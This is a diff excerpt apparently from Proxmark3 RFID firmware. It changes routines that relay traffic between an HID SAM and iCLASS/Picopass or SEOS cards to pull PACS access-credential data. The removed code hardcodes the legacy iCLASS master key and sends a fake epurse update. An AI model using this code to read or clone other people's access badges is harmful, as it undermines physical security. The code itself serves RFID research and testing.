-    print_dbg("-- 2", resp, resp_len);
-
-    // TAG response
-    // --  0c 05 de64 // read block 5
-    // Tag|c00a140a000000a110a10e8004 0c05de64 8102 0004 820201f4
-
-    // -----------------------------------------------------------------------------
-    // third   AIA block 5
-    // a0da02631c140a00000000bd14a012a010800a ffffff0006fffffff88e 81020000
-    //  picopass  legacy is fixed.  wants AIA and crc. ff ff ff ff ff ff ff ff ea f5
-    //  picpoasss SE                                   ff ff ff 00 06 ff ff ff f8 8e
-    hexstr_to_byte_array("a0da02631c140a00000000bd14a012a010800affffff0006fffffff88e81020000", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, hdr.app_issuer_area, sizeof(hdr.app_issuer_area));
-    AddCrc(sam_apdu + 19, 8);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 3", resp, resp_len);
-
-    // 88 02 --  readcheck  (block2 epurse, start of auth)
-    // Tag|c00a140a000000a10ea10c8002 8802 8102 0004 820201f4 9000
-    //    61 16 f5 0a140a000000a10ea10c 8002 8802 8102 0004 820201f4 9000
-
-    // -----------------------------------------------------------------------------
-    // forth  EPURSE
-    // a0da02631a140a00000000bd12a010a00e8008 ffffffffedffffff 81020000
-    hexstr_to_byte_array("a0da02631a140a00000000bd12a010a00e8008ffffffffedffffff81020000", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, hdr.epurse, sizeof(hdr.epurse));
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 4", resp, resp_len);
-
-    uint8_t nr_mac[9] = {0};
-    memcpy(nr_mac, resp + 11, sizeof(nr_mac));
-    // resp here hold the whole   NR/MAC
-    // 05 9bcd475e965ee20e // CHECK (w key)
-    print_dbg("NR/MAC", nr_mac, sizeof(nr_mac));
-
-    // c00a140a000000a115a1138009 059bcd475e965ee20e 8102 0004 820201f4 9000
-
-    // pre calc ourself?
-    // uint8_t cc_nr[] = {0xFE, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0, 0, 0, 0};
-    uint8_t div_key[8] = {0};
-    static uint8_t legacy_aa1_key[] = {0xAE, 0xA6, 0x84, 0xA6, 0xDA, 0xB2, 0x32, 0x78};
-    iclass_calc_div_key(hdr.csn, legacy_aa1_key, div_key, false);
-
-    uint8_t mac[4] = {0};
-    if (g_dbglevel == DBG_DEBUG) {
-        uint8_t wb[16] = {0};
-        memcpy(wb, hdr.epurse, sizeof(hdr.epurse));
-        memcpy(wb + sizeof(hdr.epurse), nr_mac + 1, 4);
-        print_dbg("cc_nr...", wb, sizeof(wb));
-        doMAC_N(wb, sizeof(wb), div_key, mac);
-        print_dbg("Calc MAC...", mac, sizeof(mac));
-    }
-
-    // start ssp clock again...
-    StartCountSspClk();
-
-    // NOW we auth against tag
-    uint8_t cmd_check[9] = { ICLASS_CMD_CHECK };
-    memcpy(cmd_check + 1, nr_mac + 1, 8);
-
-    start_time = GetCountSspClk();
-    iclass_send_as_reader(cmd_check, sizeof(cmd_check), &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 4) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    // store MAC
-    memcpy(mac, resp, sizeof(mac));
-    print_dbg("Got MAC", mac, sizeof(mac));
-
-    // -----------------------------------------------------------------------------
-    // fifth  send received MAC
-    // A0DA026316140A00000000BD0EA00CA00A8004 311E32E9 81020000
-    hexstr_to_byte_array("A0DA026316140A00000000BD0EA00CA00A8004311E32E981020000", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, mac, sizeof(mac));
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 5", resp, resp_len);
-
-    uint8_t tmp_p1[4] = {0};
-    uint8_t tmp_p2[4] = {0};
-
-    // c161c10000a11aa118800e8702 ffffffff88ffffff 0a914eb981020004820236b09000
-
-    memcpy(tmp_p1, resp + 13, sizeof(tmp_p1));
-    memcpy(tmp_p2, resp + 13 + 4, sizeof(tmp_p2));
-    // -----------------------------------------------------------------------------
-    // sixth  send fake epurse update
-    // A0DA02631C140A00000000BD14A012A010800A 88FFFFFFFFFFFFFF9DE1 81020000
-    hexstr_to_byte_array("A0DA02631C140A00000000BD14A012A010800A88FFFFFFFFFFFFFF9DE181020000", sam_apdu, &sam_len);
-
-    memcpy(sam_apdu + 19, tmp_p2, sizeof(tmp_p1));
-    memcpy(sam_apdu + 19 + 4, tmp_p1, sizeof(tmp_p1));
-    AddCrc(sam_apdu + 19, 8);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 6", resp, resp_len);
-    // c1 61 c1 00 00 a1 10 a1 0e 80 04 0c 06 45 56 81 02 00 04 82 02 01 f4 90 00
-
-    // read block 6
-    StartCountSspClk();
-    start_time = GetCountSspClk();
-    iclass_send_as_reader(resp + 11, 4, &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS || resp_len != 10) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("Block 6 from Picopass", resp, resp_len);
-
-    // -----------------------------------------------------------------------------
-    // eight  send block 6 config to SAM
-    // A0DA02631C140A00000000BD14A012A010800A 030303030003E0174323 81020000
-    hexstr_to_byte_array("A0DA02631C140A00000000BD14A012A010800A030303030003E017432381020000", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, resp, resp_len);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 7", resp, resp_len);
-
-    // c161c10000a110a10e8004 0606455681020004820201f49000
-
-    // read the credential blocks
-    StartCountSspClk();
-    start_time = GetCountSspClk();
-    iclass_send_as_reader(resp + 11, 4, &start_time, &eof_time, shallow_mod);
-
-    // expect a 10-byte response here
-    res = GetIso15693AnswerFromTag(resp, ISO7816_MAX_FRAME, ICLASS_READER_TIMEOUT_OTHERS, &eof_time, false, true, &resp_len);
-    if (res != PM3_SUCCESS) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("Block 6-9 from Picopass", resp, resp_len);
-
-    // -----------------------------------------------------------------------------
-    // nine  send credential blocks to SAM
-    // A0DA026334140A00000000BD2CA02AA0288022 030303030003E017769CB4A198E0DEC82AD4C8211F9968712BE7393CF8E71D7E804C 81020000
-    hexstr_to_byte_array("A0DA026334140A00000000BD2CA02AA0288022030303030003E017769CB4A198E0DEC82AD4C8211F9968712BE7393CF8E71D7E804C81020000", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, resp, resp_len);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-    print_dbg("-- 8", resp, resp_len);
-
-
-    // -----------------------------------------------------------------------------
-    // TEN  ask for PACS data
-    // A0DA02630C440A00000000BD04A0028200
-    hexstr_to_byte_array("A0DA02630C440A00000000BD04A0028200", sam_apdu, &sam_len);
-    memcpy(sam_apdu + 19, resp, resp_len);
-
-    if (sam_rxtx(sam_apdu, sam_len, resp, &resp_len) == false) {
-        res = PM3_ECARDEXCHANGE;
-        goto out;
-    }
-
-    print_dbg("-- 9  response", resp, resp_len);
-    if (memcmp(resp, "\xc1\x64\x00\x00\x00\xbd\x17\x8a\x15", 9) == 0) {
-        res = PM3_ENOPACS;
-        goto out;
-    }
-
-    // c164000000bd098a07 030506951f9a00 9000
-    uint8_t *pacs = BigBuf_calloc(resp[8]);
-    memcpy(pacs, resp + 9, resp[8]);
-
-    print_dbg("-- 10  PACS data", pacs, resp[8]);
-
-    reply_ng(CMD_HF_SAM_PICOPASS, PM3_SUCCESS, pacs, resp[8]);
-    res = PM3_SUCCESS;
-    goto off;
-
-out:
-    reply_ng(CMD_HF_SAM_PICOPASS, res, NULL, 0);
-
-off:
-    switch_off();
     BigBuf_free();
     return res;
 }
 
-// HID SAM <-> MFC
-// HID SAM <-> SEOS
+
+/**
+ * @brief Sets the card detected status for the SAM (Secure Access Module).
+ *
+ * This function informs that a card has been detected by the reader and
+ * initializes SAM communication with the card.
+ *
+ * @param card_select Pointer to the descriptor of the detected card.
+ * @return Status code indicating success or failure of the operation.
+ */
+static int sam_set_card_detected_picopass(const picopass_hdr_t *card_select) {
+    int res = PM3_SUCCESS;
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_set_card_detected");
+    }
+    uint8_t *response = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t response_len = ISO7816_MAX_FRAME;
+
+    // a0 12
+    //    ad 10
+    //       a0 0e
+    //          80 02
+    //             00 04 <- Picopass
+    //          81 08
+    //             9b fc a4 00 fb ff 12 e0  <- CSN
+
+    uint8_t payload[] = {
+        0xa0, 18, // <- SAM command
+        0xad, 16, // <- set detected card
+        0xa0, 4 + 10,
+        0x80, 2, // <- protocol
+        0x00, 0x04, // <- Picopass
+        0x81, 8, // <- CSN
+        card_select->csn[0], card_select->csn[1], card_select->csn[2], card_select->csn[3],
+        card_select->csn[4], card_select->csn[5], card_select->csn[6], card_select->csn[7]
+    };
+    uint16_t payload_len = sizeof(payload);
+
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        payload,
+        &payload_len,
+        response,
+        &response_len
+    );
+
+    // resp:
+    // c1 64 00 00 00
+    //    bd 02 <- response
+    //     8a 00 <- empty response (accepted)
+    // 90 00
+
+    if (response[5] != 0xbd) {
+        if (g_dbglevel >= DBG_ERROR)
+            Dbprintf("Invalid SAM response");
+        goto error;
+    } else {
+        // uint8_t * sam_response_an = sam_find_asn1_node(response + 5, 0x8a);
+        // if(sam_response_an == NULL){
+        //     if (g_dbglevel >= DBG_ERROR)
+        //         Dbprintf("Invalid SAM response");
+        //     goto error;
+        // }
+        goto out;
+    }
+error:
+    res = PM3_ESOFT;
+
+out:
+    BigBuf_free();
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_set_card_detected");
+    }
+    return res;
+}
+
+
+/**
+ * @brief Retrieves PACS data from PICOPASS card using SAM.
+ *
+ * This function is called by appmain.c
+ * It sends a request to the SAM to get the PACS data from the PICOPASS card.
+ * The PACS data is then returned to the PM3 client.
+ *
+ * @return Status code indicating success or failure of the operation.
+ */
+int sam_picopass_get_pacs(PacketCommandNG *c) {
+    const uint8_t flags = c->data.asBytes[0];
+    const bool disconnectAfter = !!(flags & BITMASK(0));
+    const bool skipDetect = !!(flags & BITMASK(1));
+    const bool breakOnNrMac = !!(flags & BITMASK(2));
+    const bool preventEpurseUpdate = !!(flags & BITMASK(3));
+    const bool shallow_mod = !!(flags & BITMASK(4));
+    const bool info = !!(flags & BITMASK(5));
+
+    uint8_t *cmd = c->data.asBytes + 1;
+    uint16_t cmd_len = c->length - 1;
+
+    int res = PM3_EFAILED;
+    uint8_t sam_response[ISO7816_MAX_FRAME] = { 0x00 };
+    uint8_t sam_response_len = 0;
+
+    clear_trace();
+    I2C_Reset_EnterMainProgram();
+
+    set_tracing(true);
+    StartTicks();
+
+    // step 1: ping SAM
+    sam_get_version(info);
+
+    if (info) {
+        sam_get_serial_number();
+        goto out;
+    }
+
+    if (skipDetect == false) {
+        // step 2: get card information
+        picopass_hdr_t card_a_info;
+        uint32_t eof_time = 0;
+
+        // implicit StartSspClk() happens here
+        Iso15693InitReader();
+        if (select_iclass_tag(&card_a_info, false, &eof_time, shallow_mod) == false) {
+            goto err;
+        }
+
+        switch_clock_to_ticks();
+
+        // step 3: SamCommand CardDetected
+        sam_set_card_detected_picopass(&card_a_info);
+    }
+
+    // step 3: SamCommand RequestPACS, relay NFC communication
+    res = sam_send_request_iso15(cmd, cmd_len, sam_response, &sam_response_len, shallow_mod, breakOnNrMac, preventEpurseUpdate);
+    if (res != PM3_SUCCESS) {
+        goto err;
+    }
+
+    if (g_dbglevel >= DBG_INFO) {
+        print_result("Response data", sam_response, sam_response_len);
+    }
+
+    goto out;
+
+err:
+    res = PM3_ENOPACS;
+    reply_ng(CMD_HF_SAM_PICOPASS, res, NULL, 0);
+    goto off;
+
+out:
+    reply_ng(CMD_HF_SAM_PICOPASS, PM3_SUCCESS, sam_response, sam_response_len);
+
+off:
+    if (disconnectAfter) {
+        switch_off();
+    }
+    set_tracing(false);
+    StopTicks();
+    BigBuf_free();
+    return res;
+}

armsrc/sam_picopass.h

@@ -17,7 +17,9 @@
 #define __SAM_PICOPASS_H
 
 #include "common.h"
+#include "sam_common.h"
+#include "pm3_cmd.h"
 
-int sam_picopass_get_pacs(void);
+int sam_picopass_get_pacs(PacketCommandNG *c);
 
 #endif

armsrc/sam_seos.c

@@ -14,9 +14,320 @@
 // See LICENSE.txt for the text of the license.
 //-----------------------------------------------------------------------------
 // Routines to support SEOS <-> SAM communication
+// communication and ASN.1 messages based on https://github.com/bettse/seader/blob/main/seader.asn1
 //-----------------------------------------------------------------------------
 #include "sam_seos.h"
+#include "sam_common.h"
 #include "iclass.h"
 
 #include "proxmark3_arm.h"
+#include "iso14443a.h"
+
+#include "iclass.h"
+#include "crc16.h"
+#include "proxmark3_arm.h"
+#include "BigBuf.h"
 #include "cmd.h"
+#include "commonutil.h"
+#include "ticks.h"
+#include "dbprint.h"
+#include "i2c.h"
+#include "protocols.h"
+#include "optimized_cipher.h"
+#include "fpgaloader.h"
+#include "pm3_cmd.h"
+
+#include "cmd.h"
+
+
+/**
+ * @brief Sets the card detected status for the SAM (Secure Access Module).
+ *
+ * This function informs that a card has been detected by the reader and
+ * initializes SAM communication with the card.
+ *
+ * @param card_select Pointer to the descriptor of the detected card.
+ * @return Status code indicating success or failure of the operation.
+ */
+static int sam_set_card_detected_seos(iso14a_card_select_t *card_select) {
+    int res = PM3_SUCCESS;
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_set_card_detected");
+    }
+
+    uint8_t *request = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t request_len = ISO7816_MAX_FRAME;
+
+    uint8_t *response = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint16_t response_len = ISO7816_MAX_FRAME;
+
+    const uint8_t payload[] = {
+        0xa0, 8, // <- SAM command
+        0xad, 6, // <- set detected card
+        0xa0, 4, // <- detected card details
+        0x80, 2, // <- protocol
+        0x00, 0x02 // <- ISO14443A
+    };
+
+    memcpy(request, payload, sizeof(payload));
+    sam_append_asn1_node(request, request + 4, 0x81, card_select->uid, card_select->uidlen);
+    sam_append_asn1_node(request, request + 4, 0x82, card_select->atqa, 2);
+    sam_append_asn1_node(request, request + 4, 0x83, &card_select->sak, 1);
+    request_len = request[1] + 2;
+
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        request,
+        &request_len,
+        response,
+        &response_len
+    );
+
+    // resp:
+    // c1 64 00 00 00
+    //    bd 02 <- response
+    //     8a 00 <- empty response (accepted)
+    // 90 00
+
+    if (response[5] != 0xbd) {
+        if (g_dbglevel >= DBG_ERROR)
+            Dbprintf("Invalid SAM response");
+        goto error;
+    } else {
+        // uint8_t * sam_response_an = sam_find_asn1_node(response + 5, 0x8a);
+        // if(sam_response_an == NULL){
+        //     if (g_dbglevel >= DBG_ERROR)
+        //         Dbprintf("Invalid SAM response");
+        //     goto error;
+        // }
+        goto out;
+    }
+error:
+    res = PM3_ESOFT;
+
+out:
+    BigBuf_free();
+
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("end sam_set_card_detected");
+    }
+    return res;
+}
+
+/**
+ * @brief Sends a request to the SAM and retrieves the response.
+ *
+ * Unpacks request to the SAM and relays ISO14A traffic to the card.
+ * If no request data provided, sends a request to get PACS data.
+ *
+ * @param request Pointer to the buffer containing the request to be sent to the SAM.
+ * @param request_len Length of the request to be sent to the SAM.
+ * @param response Pointer to the buffer where the retreived data will be stored.
+ * @param response_len Pointer to the variable where the length of the retreived data will be stored.
+ * @return Status code indicating success or failure of the operation.
+ */
+static int sam_send_request_iso14a(const uint8_t *const request, const uint8_t request_len, uint8_t *response, uint8_t *response_len) {
+
+    int res = PM3_SUCCESS;
+    if (g_dbglevel >= DBG_DEBUG) {
+        DbpString("start sam_send_request_iso14a");
+    }
+
+    uint8_t *buf1 = BigBuf_calloc(ISO7816_MAX_FRAME);
+    uint8_t *buf2 = BigBuf_calloc(ISO7816_MAX_FRAME);
+    if (buf1 == NULL || buf2 == NULL) {
+        res = PM3_EMALLOC;
+        goto out;
+    }
+
+    uint8_t *sam_tx_buf = buf1;
+    uint16_t sam_tx_len;
+
+    uint8_t *sam_rx_buf = buf2;
+    uint16_t sam_rx_len;
+
+    uint8_t *nfc_tx_buf = buf1;
+    uint16_t nfc_tx_len;
+
+    uint8_t *nfc_rx_buf = buf2;
+    uint16_t nfc_rx_len;
+
+    if (request_len > 0) {
+        sam_tx_len = request_len;
+        memcpy(sam_tx_buf, request, sam_tx_len);
+    } else {
+        // send get pacs
+        static const uint8_t payload[] = {
+            0xa0, 19, // <- SAM command
+            0xBE, 17, // <- samCommandGetContentElement2
+            0x80, 1,
+            0x04, // <- implicitFormatPhysicalAccessBits
+            0x84, 12,
+            0x2B, 0x06, 0x01, 0x04, 0x01, 0x81, 0xE4, 0x38, 0x01, 0x01, 0x02, 0x04 // <- SoRootOID
+        };
+
+        sam_tx_len = sizeof(payload);
+        memcpy(sam_tx_buf, payload, sam_tx_len);
+    }
+
+    sam_send_payload(
+        0x44, 0x0a, 0x44,
+        sam_tx_buf, &sam_tx_len,
+        sam_rx_buf, &sam_rx_len
+    );
+
+    if (sam_rx_buf[1] == 0x61) { // commands to be relayed to card starts with 0x61
+        // tag <-> SAM exchange starts here
+        while (sam_rx_buf[1] == 0x61) {
+            switch_clock_to_countsspclk();
+            nfc_tx_len = sam_copy_payload_sam2nfc(nfc_tx_buf, sam_rx_buf);
+
+            nfc_rx_len = iso14_apdu(nfc_tx_buf, nfc_tx_len, false, nfc_rx_buf, ISO7816_MAX_FRAME, NULL);
+            // iceman:  should check nfc_rx_len ,  if negative something went wrong...
+
+            switch_clock_to_ticks();
+            sam_tx_len = sam_copy_payload_nfc2sam(sam_tx_buf, nfc_rx_buf, nfc_rx_len - 2);
+
+            sam_send_payload(0x14, 0x0a, 0x14, sam_tx_buf, &sam_tx_len, sam_rx_buf, &sam_rx_len);
+
+            // last SAM->TAG
+            // c1 61 c1 00 00 a1 02 >>82<< 00 90 00
+            if (sam_rx_buf[7] == 0x82) {
+                // tag <-> SAM exchange ends here
+                break;
+            }
+
+        }
+
+        static const uint8_t hfack[] = {
+            0xbd, 0x04, 0xa0, 0x02, 0x82, 0x00
+        };
+
+        sam_tx_len = sizeof(hfack);
+        memcpy(sam_tx_buf, hfack, sam_tx_len);
+
+        sam_send_payload(
+            0x14, 0x0a, 0x00,
+            sam_tx_buf, &sam_tx_len,
+            sam_rx_buf, &sam_rx_len
+        );
+    }
+
+    // resp for SamCommandGetContentElement:
+    // c1 64 00 00 00
+    // bd 09
+    //    8a 07
+    //        03 05 <- include tag for pm3 client
+    //           06 85 80 6d c0 <- decoded PACS data
+    // 90 00
+
+    // resp for samCommandGetContentElement2:
+    // c1 64 00 00 00
+    // bd 1e
+    //    b3 1c
+    //       a0 1a
+    //          80 05
+    //             06 85 80 6d c0
+    //           81 0e
+    //              2b 06 01 04 01 81 e4 38 01 01 02 04 3c ff
+    //           82 01
+    //              07
+    // 90 00
+    if (request_len == 0) {
+
+        if (
+            !(sam_rx_buf[5] == 0xbd && sam_rx_buf[5 + 2] == 0x8a && sam_rx_buf[5 + 4] == 0x03) &&
+            !(sam_rx_buf[5] == 0xbd && sam_rx_buf[5 + 2] == 0xb3 && sam_rx_buf[5 + 4] == 0xa0)
+        ) {
+
+            if (g_dbglevel >= DBG_ERROR) {
+                Dbprintf("No PACS data in SAM response");
+            }
+            res = PM3_ESOFT;
+        }
+    }
+
+    *response_len = sam_rx_buf[5 + 1] + 2;
+    memcpy(response, sam_rx_buf + 5, *response_len);
+
+out:
+    BigBuf_free();
+    return res;
+}
+
+/**
+ * @brief Retrieves PACS data from SEOS card using SAM.
+ *
+ * This function is called by appmain.c
+ * It sends a request to the SAM to get the PACS data from the SEOS card.
+ * The PACS data is then returned to the PM3 client.
+ *
+ * @return Status code indicating success or failure of the operation.
+ */
+int sam_seos_get_pacs(PacketCommandNG *c) {
+    const uint8_t flags = c->data.asBytes[0];
+    const bool disconnectAfter = !!(flags & BITMASK(0));
+    const bool skipDetect = !!(flags & BITMASK(1));
+
+    uint8_t *cmd = c->data.asBytes + 1;
+    uint16_t cmd_len = c->length - 1;
+
+
+    int res = PM3_EFAILED;
+
+    clear_trace();
+    I2C_Reset_EnterMainProgram();
+
+    set_tracing(true);
+    StartTicks();
+
+    // step 1: ping SAM
+    sam_get_version(false);
+
+    if (skipDetect == false) {
+        // step 2: get card information
+        iso14a_card_select_t card_a_info;
+
+        // implicit StartSspClk() happens here
+        iso14443a_setup(FPGA_HF_ISO14443A_READER_MOD);
+        if (iso14443a_select_card(NULL, &card_a_info, NULL, true, 0, false) == 0) {
+            goto err;
+        }
+
+        switch_clock_to_ticks();
+
+        // step 3: SamCommand CardDetected
+        sam_set_card_detected_seos(&card_a_info);
+    }
+
+    // step 3: SamCommand RequestPACS, relay NFC communication
+    uint8_t sam_response[ISO7816_MAX_FRAME] = { 0x00 };
+    uint8_t sam_response_len = 0;
+    res = sam_send_request_iso14a(cmd, cmd_len, sam_response, &sam_response_len);
+    if (res != PM3_SUCCESS) {
+        goto err;
+    }
+
+    if (g_dbglevel >= DBG_INFO) {
+        print_result("Response data", sam_response, sam_response_len);
+    }
+
+    goto out;
+
+err:
+    res = PM3_ENOPACS;
+    reply_ng(CMD_HF_SAM_SEOS, res, NULL, 0);
+    goto off;
+
+out:
+    reply_ng(CMD_HF_SAM_SEOS, PM3_SUCCESS, sam_response, sam_response_len);
+
+off:
+    if (disconnectAfter) {
+        switch_off();
+    }
+    set_tracing(false);
+    StopTicks();
+    BigBuf_free();
+    return res;
+}

armsrc/sam_seos.h

@@ -17,5 +17,8 @@
 #define __SAM_SEOS_H
 
 #include "common.h"
+#include "pm3_cmd.h"
+
+int sam_seos_get_pacs(PacketCommandNG *c);
 
 #endif

armsrc/spiffs.c

@@ -18,7 +18,6 @@
 // SPIFFS api for RDV40 Integration
 //-----------------------------------------------------------------------------
 
-#define SPIFFS_CFG_PHYS_SZ (1024 * 192)
 #define SPIFFS_CFG_PHYS_ERASE_SZ (4 * 1024)
 #define SPIFFS_CFG_PHYS_ADDR (0)
 #define SPIFFS_CFG_LOG_PAGE_SZ (256)
@@ -313,7 +312,7 @@ static int is_valid_filename(const char *filename) {
 */
 static void copy_in_spiffs(const char *src, const char *dst) {
     uint32_t size = size_in_spiffs(src);
-    uint8_t *mem = BigBuf_malloc(size);
+    uint8_t *mem = BigBuf_calloc(size);
     read_from_spiffs(src, (uint8_t *)mem, size);
     write_to_spiffs(dst, (uint8_t *)mem, size);
 }
@@ -578,19 +577,25 @@ int rdv40_spiffs_make_symlink(const char *linkdest, const char *filename, RDV40S
 // preexistence, avoiding a link being created if filename exists, or avoiding a file being created if
 // symlink exists with same name
 int rdv40_spiffs_read_as_filetype(const char *filename, uint8_t *dst, uint32_t size, RDV40SpiFFSSafetyLevel level) {
+
     RDV40_SPIFFS_SAFE_FUNCTION(
+
         RDV40SpiFFSFileType filetype = filetype_in_spiffs((char *)filename);
+
     switch (filetype) {
-    case RDV40_SPIFFS_FILETYPE_REAL:
+    case RDV40_SPIFFS_FILETYPE_REAL: {
         rdv40_spiffs_read(filename, dst, size, level);
             break;
-        case RDV40_SPIFFS_FILETYPE_SYMLINK:
+        }
+        case RDV40_SPIFFS_FILETYPE_SYMLINK: {
             rdv40_spiffs_read_as_symlink(filename, dst, size, level);
             break;
+        }
         case RDV40_SPIFFS_FILETYPE_BOTH:
         case RDV40_SPIFFS_FILETYPE_UNKNOWN:
-        default:
+        default: {
             break;
+        }
     }
     )
 }
@@ -652,11 +657,14 @@ void rdv40_spiffs_safe_print_tree(void) {
 
             read_from_spiffs((char *)pe->name, (uint8_t *)linkdest, SPIFFS_OBJ_NAME_LEN);
             sprintf(resolvedlink, "(.lnk) --> %s", linkdest);
-            // Kind of stripping the .lnk extension
-            strtok((char *)pe->name, ".");
+            char *linkname = (char *)pe->name;
+            int len = strlen(linkname);
+            if (len >= 4 && strcmp(&linkname[len - 4], ".lnk") == 0) {
+                linkname[len - 4] = '\0';
+            }
         }
 
-        Dbprintf("[%04x] " _YELLOW_("%5i") " B |-- %s%s", pe->obj_id, pe->size, pe->name, resolvedlink);
+        Dbprintf("[%04u] " _YELLOW_("%5i") " B |-- %s%s", pe->obj_id, pe->size, pe->name, resolvedlink);
         printed = true;
     }
     if (printed == false) {
@@ -684,10 +692,10 @@ void rdv40_spiffs_safe_wipe(void) {
             read_from_spiffs((char *)pe->name, (uint8_t *)linkdest, SPIFFS_OBJ_NAME_LEN);
 
             remove_from_spiffs(linkdest);
-            Dbprintf(".lnk removed %s", pe->name);
+            Dbprintf("removed %s", linkdest);
 
             remove_from_spiffs((char *)pe->name);
-            Dbprintf("removed %s", linkdest);
+            Dbprintf(".lnk removed %s", pe->name);
 
         } else {
             remove_from_spiffs((char *)pe->name);